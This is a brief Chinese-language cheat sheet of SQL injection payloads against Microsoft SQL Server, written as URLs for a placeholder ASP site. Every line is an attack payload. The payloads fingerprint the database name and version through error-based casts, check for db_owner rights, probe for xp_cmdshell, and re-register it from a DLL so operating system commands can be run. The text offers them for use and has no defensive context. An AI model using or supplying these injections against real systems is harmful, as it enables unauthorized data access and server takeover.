库名检测:
http://www.xxx.com/asp?=xx' and user>0-- //“--”是注视,判断库名.
SQL系统版本检测:
http://www.xxx.com/asp?=xx' and 1=(select @@VERSION)-- //Microsoft SQL Server版本
http://www.xxx.com/asp?=xx' and 1=convert(int,@@version)-- //Microsoft SQL Server版本
数据库权限判断:
http://www.xxx.com/asp?=xx and 1=(Select IS_MEMBER('db_owner'))
http://www.xxx.com/asp?=xx and char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
判断xp_cmdshell扩展存储过程是否存在:
http://www.xxx.com/asp?=xx and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
恢复xp_cmdshell扩展存储的命令:
http://www.xxx.com/asp?=xx ;exec master.dbo.sp_addextendedproc 'xp_cmdshell','X:\inetput\web\xplog70.dll';-- //"x"盘符